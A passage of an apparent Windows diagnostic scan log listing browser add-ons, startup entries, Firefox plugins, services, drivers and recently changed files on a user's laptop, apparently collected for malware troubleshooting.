BHO: Norton Vulnerability Protection: {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_40\bin\ssv.dll
BHO: Adobe Acrobat Create PDF Helper: {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll
BHO: Skype Click to Call for Internet Explorer: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_40\bin\jp2ssv.dll
BHO: Adobe Acrobat Create PDF from Selection: {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll
TB: Adobe Acrobat Create PDF Toolbar: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll
TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\coieplg.dll
uRun: [MySQL Notifier] C:\Program Files (x86)\MySQL\MySQL Notifier 1.1\MySqlNotifier.exe
uRun: [GoogleChromeAutoLaunch_C808038095EFA9BE95E2C3158E13BB87] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
uRun: [Dropbox Update] "C:\Users\philippe\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
uRun: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
uRun: [OneDrive] "C:\Users\philippe\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRun: [f.lux] "C:\Users\philippe\AppData\Local\FluxSoftware\Flux\flux.exe" /noshow
uRunOnce: [Uninstall C:\Users\philippe\AppData\Local\Microsoft\OneDrive\17.3.5892.0626\amd64] C:\WINDOWS\System32\cmd.exe /q /c rmdir /s /q "C:\Users\philippe\AppData\Local\Microsoft\OneDrive\17.3.5892.0626\amd64"
uRunOnce: [Uninstall C:\Users\philippe\AppData\Local\Microsoft\OneDrive\17.3.5907.0716\amd64] C:\WINDOWS\System32\cmd.exe /q /c rmdir /s /q "C:\Users\philippe\AppData\Local\Microsoft\OneDrive\17.3.5907.0716\amd64"
uRunOnce: [Uninstall C:\Users\philippe\AppData\Local\Microsoft\OneDrive\17.3.5930.0814\amd64] C:\WINDOWS\System32\cmd.exe /q /c rmdir /s /q "C:\Users\philippe\AppData\Local\Microsoft\OneDrive\17.3.5930.0814\amd64"
mRun: [mcui_exe] "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
mRun: [vmware-tray.exe] "C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe"
mRun: [Adobe Creative Cloud] "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
mRun: [Acrobat Assistant 8.0] "C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Acrotray.exe"
mRun: [Razer Synapse] "C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe"
mExplorerRun: [BtvStack] "C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe"
StartupFolder: C:\Users\philippe\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\Dropbox.lnk - C:\Users\philippe\AppData\Roaming\Dropbox\bin\Dropbox.exe
StartupFolder: C:\Users\philippe\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\VERZEN~1.LNK - C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\StartUp\STEELS~1.LNK - C:\Program Files\SteelSeries\SteelSeries Engine 3\SteelSeriesEngine3.exe
mPolicies-System: DSCAutomationHostEnabled = dword:2
IE: E&xport to Microsoft Excel - C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\Program Files\Microsoft Office 15\Root\Office15\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office 15\root\office15\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office 15\root\office15\ONBttnIELinkedNotes.dll
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
TCP: NameServer = 195.130.130.132 195.130.131.132
TCP: Interfaces\{9f37bd29-efb0-458c-ae2b-73e77f48bb58} : DHCPNameServer = 195.130.130.132 195.130.131.132
TCP: Interfaces\{9f37bd29-efb0-458c-ae2b-73e77f48bb58}\45D4F57457563747 : DHCPNameServer = 172.30.2.10
TCP: Interfaces\{9f37bd29-efb0-458c-ae2b-73e77f48bb58}\4756C656E65647D25444247343 : DHCPNameServer = 195.130.130.132 195.130.131.132
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\office15\msosb.dll
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-BHO: Skype for Business Browser Helper: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll
x64-BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine64\22.5.2.15\coieplg.dll
x64-BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_40\bin\ssv.dll
x64-BHO: CIESpeechBHO Class: {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll
x64-BHO: Adobe Acrobat Create PDF Helper: {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll
x64-BHO: Skype Click to Call for Internet Explorer: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-BHO: Microsoft SkyDrive Pro Browser Helper: {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL
x64-BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_40\bin\jp2ssv.dll
x64-BHO: Adobe Acrobat Create PDF from Selection: {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll
x64-TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\22.5.2.15\coieplg.dll
x64-TB: Adobe Acrobat Create PDF Toolbar: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [RtHDVBg_Dolby] "C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe" /FORPCEE4
x64-Run: [IgfxTray] C:\WINDOWS\System32\igfxtray.exe
x64-Run: [AdobeAAMUpdater-1.0] "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
x64-Run: [NvBackend] "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
x64-Run: [ShadowPlay] C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\nvspcap64.dll,ShadowPlayOnSystemStart
x64-Run: [SynTPEnh] C:\Program Files (x86)\Synaptics\SynTP\SynTPEnh.exe
x64-ExplorerRun: [BtvStack] "C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe"
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ONBttnIE.dll
x64-IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
x64-IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll
x64-Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - <orphaned>
x64-Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll
x64-Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\philippe\AppData\Roaming\Mozilla\Firefox\Profiles\e3w9td4s.default\
FF - plugin: C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll
FF - plugin: C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll
FF - plugin: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_40\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_40\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll
FF - plugin: C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL
FF - plugin: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll
.
============= SERVICES / DRIVERS ===============
.
R0 iaStorA;iaStorA;C:\WINDOWS\System32\drivers\iaStorA.sys [2013-2-1 652784]
R0 nvpciflt;nvpciflt;C:\WINDOWS\System32\drivers\nvpciflt.sys [2015-7-13 31560]
R0 SymEFASI;Symantec Extended File Attributes (SI);C:\WINDOWS\System32\drivers\NISx64\1605020.00F\symefasi64.sys [2015-7-21 1620720]
R0 vsock;vSockets Driver;C:\WINDOWS\System32\drivers\vsock.sys [2014-9-26 73296]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2015-7-10 106520]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2015-7-10 17944]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2015-8-20 200528]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2015-7-10 215552]
R1 BHDrvx64;BHDrvx64;C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.0.124\Definitions\BASHDefs\20150904.001\BHDrvx64.sys [2015-9-18 1650936]
R1 ccSet_NAT;Norton Anti-Theft Settings Manager;C:\WINDOWS\System32\drivers\NATx64\010A000.009\ccSetx64.sys [2014-9-20 150104]
R1 ccSet_NIS;NIS Settings Manager;C:\WINDOWS\System32\drivers\NISx64\1605020.00F\ccsetx64.sys [2015-7-21 173808]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2015-7-10 83968]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2015-7-10 8192]
R1 IDSVia64;IDSVia64;C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.0.124\Definitions\IPSDefs\20150918.002\IDSviA64.sys [2015-9-19 767224]
R1 SymIRON;Symantec Iron Driver;C:\WINDOWS\System32\drivers\NISx64\1605020.00F\ironx64.sys [2015-7-21 297720]
R1 SymNetS;Symantec Network Security WFP Driver;C:\WINDOWS\System32\drivers\NISx64\1605020.00F\symnets.sys [2015-7-21 576248]
R2 AdobeUpdateService;AdobeUpdateService;C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [2015-7-22 680112]
R2 c2cautoupdatesvc;Skype Click to Call Updater;C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [2015-5-1 1394816]
R2 c2cpnrsvc;Skype Click to Call PNR Service;C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [2015-5-1 1772672]
R2 CCDMonitorService;CCDMonitorService;C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2013-2-27 2615368]
R2 ClickToRunSvc;Microsoft Office ClickToRun Service;C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe [2014-9-19 2753720]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork [2015-7-10 39856]
R2 DiagTrack;Diagnostics Tracking Service;C:\WINDOWS\System32\svchost.exe -k utcsvc [2015-7-10 39856]
R2 rzpmgrk;rzpmgrk;C:\WINDOWS\System32\drivers\rzpmgrk.sys [2015-5-4 37184]
R2 rzpnk;rzpnk;C:\WINDOWS\System32\drivers\rzpnk.sys [2015-5-4 129600]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2015-7-10 61952]
R3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2015-7-10 39856]
R3 BtFilter;BtFilter;C:\WINDOWS\System32\drivers\btfilter.sys [2015-3-9 599240]
R3 ccSet_NARA;NARA Settings Manager;C:\WINDOWS\System32\drivers\NARAx64\0403000.00E\ccSetx64.sys [2013-10-14 168608]
R3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2015-7-10 39856]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2015-7-29 153936]
R3 iwdbus;IWD Bus Enumerator;C:\WINDOWS\System32\drivers\iwdbus.sys [2015-3-4 30512]
R3 k57nd60a;Broadcom NetLink (TM) Gigabit Ethernet - NDIS 6.0;C:\WINDOWS\System32\drivers\k57nd60a.sys [2014-7-24 458960]
R3 LMDriver;Launch Manager Wireless Driver;C:\WINDOWS\System32\drivers\LMDriver.sys [2013-1-10 21360]
R3 MBAMProtector;MBAMProtector;C:\WINDOWS\System32\drivers\mbam.sys [2015-9-19 25816]
R3 MBAMSwissArmy;MBAMSwissArmy;C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [2015-9-19 113880]
R3 MBAMWebAccessControl;MBAMWebAccessControl;C:\WINDOWS\System32\drivers\mwac.sys [2015-9-19 64216]
R3 mfesapsn;McAfee Process Start Notification Service;C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [2015-8-20 37960]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2015-7-10 20992]
R3 NvStreamKms;NvStreamKms;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [2015-2-11 19600]
R3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);C:\WINDOWS\System32\drivers\nvvad64v.sys [2015-2-11 38032]
R3 RadioShim;Shim for HID-KMDF Interface layer;C:\WINDOWS\System32\drivers\RadioShim.sys [2013-1-10 15704]
R3 SmbDrvI;SmbDrvI;C:\WINDOWS\System32\drivers\Smb_driver_Intel.sys [2015-6-4 42696]
R3 sshid;SteelSeries HID Service;C:\WINDOWS\System32\drivers\sshid.sys [2014-8-13 38912]
S0 SymELAM;Symantec ELAM Driver;C:\WINDOWS\System32\drivers\NISx64\1605020.00F\symelam.sys [2015-7-21 24192]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2015-7-10 1135456]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness [2015-7-10 39856]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2015-7-10 17624]
S3 BthHFSrv;Bluetooth Handsfree Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceAndNoImpersonation [2015-7-10 39856]
S3 BthLEEnum;Bluetooth Low Energy Driver;C:\WINDOWS\System32\drivers\BthLEEnum.sys [2015-7-10 237568]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2015-7-10 32256]
S3 c2wts;Claims to Windows Token Service;C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe [2015-7-10 5632]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2015-7-10 116736]
S3 CDPSvc;CDPSvc;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 DcpSvc;DataCollectionPublishingService;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 DeviceFastLaneService;Device Fast-lane Service;C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [2013-5-1 470056]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2015-7-10 27136]
S3 fcvsc;fcvsc;C:\WINDOWS\System32\drivers\fcvsc.sys [2015-7-10 31232]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2015-7-10 20992]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2015-7-10 50016]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2015-7-10 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2015-7-10 122608]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2015-7-10 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2015-7-10 424800]
S3 IntcDAud;Intel(R) Display Audio;C:\WINDOWS\System32\drivers\IntcDAud.sys [2013-3-27 442368]
S3 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2015-7-10 43872]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2015-7-10 104800]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2015-7-10 99168]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2015-7-10 705376]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2015-7-10 76128]
S3 netvsc;netvsc;C:\WINDOWS\System32\drivers\netvsc.sys [2015-7-10 94720]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2015-7-10 58208]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2015-7-10 58720]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2015-8-2 934752]
S3 RSPCIESTOR;Realtek PCIE CardReader Driver;C:\WINDOWS\System32\drivers\RtsPStor.sys [2015-6-3 374016]
S3 rzendpt;rzendpt;C:\WINDOWS\System32\drivers\rzendpt.sys [2014-12-30 39592]
S3 rzudd;Razer Mouse Driver;C:\WINDOWS\System32\drivers\rzudd.sys [2014-12-30 177832]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2015-7-10 155488]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2015-8-20 80720]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2015-7-10 40288]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2015-7-10 61952]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2015-8-2 46080]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2015-7-10 44032]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2015-7-10 28512]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2015-7-10 245088]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2015-7-10 94048]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2015-7-10 127840]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2015-7-10 28512]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2015-7-10 57696]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2015-7-10 27488]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2015-7-10 31744]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2015-8-20 685568]
S3 WdNisDrv;Windows Defender Network Inspection System Driver;C:\WINDOWS\System32\drivers\WdNisDrv.sys [2015-7-10 119648]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2015-7-10 26976]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2015-7-10 59232]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2015-7-10 222720]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2015-7-10 25600]
SUnknown IoQos;IoQos; [x]
.
=============== File Associations ===============
.
FileExt: .js: Applications\Notepad.exe=C:\WINDOWS\System32\NOTEPAD.EXE %1 [UserChoice]
ShellExec: dreamweaver.exe: Open="C:\Program Files\Adobe\Adobe Dreamweaver CC 2014.1\dreamweaver.exe", "%1"
ShellExec: opera.exe: open="C:\Program Files (x86)\Opera\Launcher.exe" "%1"
.
=============== Created Last 30 ================
.
2015-09-23 12:51:48 16148 ----a-w- C:\WINDOWS\System32\PHILIPPEC-LAP_philippe_HistoryPrediction.bin
2015-09-19 18:00:33 -------- d-----w- C:\NPE
2015-09-19 15:58:35 113880 ----a-w- C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys
2015-09-19 15:58:14 64216 ----a-w- C:\WINDOWS\System32\drivers\mwac.sys
2015-09-19 15:58:14 25816 ----a-w- C:\WINDOWS\System32\drivers\mbam.sys
2015-09-19 15:58:14 109272 ----a-w- C:\WINDOWS\System32\drivers\mbamchameleon.sys
2015-09-19 15:58:13 -------- d-----w- C:\ProgramData\Malwarebytes
2015-09-19 15:58:13 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-09-18 15:10:46 -------- d-----w- C:\Users\philippe\AppData\Local\FluxSoftware
2015-09-18 14:20:13 -------- d-----r- C:\Users\philippe\Creative Cloud Files
2015-09-18 13:40:57 609592 ----a-w- C:\WINDOWS\System32\ci.dll
.
==================== Find3M ====================
.
2015-09-23 12:51:47 180 ----a-w- C:\WINDOWS\System32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2015-08-13 04:23:47 2178560 ----a-w- C:\WINDOWS\System32\AppXDeploymentServer.dll
2015-08-13 04:22:26 2093056 ----a-w- C:\WINDOWS\System32\wlidsvc.dll
2015-08-13 04:20:39 414208 ----a-w- C:\WINDOWS\System32\AppXDeploymentClient.dll
2015-08-13 04:17:58 1795072 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.dll
2015-08-13 03:53:21 311808 ----a-w- C:\WINDOWS\SysWow64\AppXDeploymentClient.dll
2015-08-11 10:04:24 2462648 ----a-w- C:\WINDOWS\System32\mfcore.dll
2015-08-11 10:04:23 4532304 ----a-w- C:\WINDOWS\explorer.exe
2015-08-11 10:04:15 1087296 ----a-w- C:\WINDOWS\System32\mfplat.dll
2015-08-11 10:03:20 8021840 ----a-w- C:\WINDOWS\System32\ntoskrnl.exe
2015-08-11 10:03:09 442208 ----a-w- C:\WINDOWS\System32\drivers\storport.sys
2015-08-11 10:02:57 554744 ----a-w- C:\WINDOWS\System32\directmanipulation.dll
2015-08-11 10:02:56 80720 ----a-w- C:\WINDOWS\System32\drivers\stornvme.sys
2015-08-11 10:02:49 292856 ----a-w- C:\WINDOWS\System32\LockAppHost.exe
2015-08-11 09:52:49 993104 ----a-w- C:\WINDOWS\System32\ReAgent.dll
2015-08-11 09:50:47 1643872 ----a-w- C:\WINDOWS\System32\diagtrack.dll
2015-08-11 09:40:22 4048808 ----a-w- C:\WINDOWS\SysWow64\explorer.exe
2015-08-11 09:40:12 918320 ----a-w- C:\WINDOWS\SysWow64\mfplat.dll
2015-08-11 09:40:08 2151208 ----a-w- C:\WINDOWS\SysWow64\mfcore.dll
2015-08-11 09:38:22 454000 ----a-w- C:\WINDOWS\SysWow64\directmanipulation.dll
2015-08-11 09:37:48 243800 ----a-w- C:\WINDOWS\SysWow64\LockAppHost.exe
2015-08-11 09:26:03 845664 ----a-w- C:\WINDOWS\SysWow64\ReAgent.dll
2015-08-11 09:23:59 16706560 ----a-w- C:\WINDOWS\System32\Windows.UI.Xaml.dll
2015-08-11 09:22:04 21875200 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2015-08-11 09:21:13 148992 ----a-w- C:\WINDOWS\System32\tetheringservice.dll
2015-08-11 09:21:04 52224 ----a-w- C:\WINDOWS\System32\tetheringclient.dll
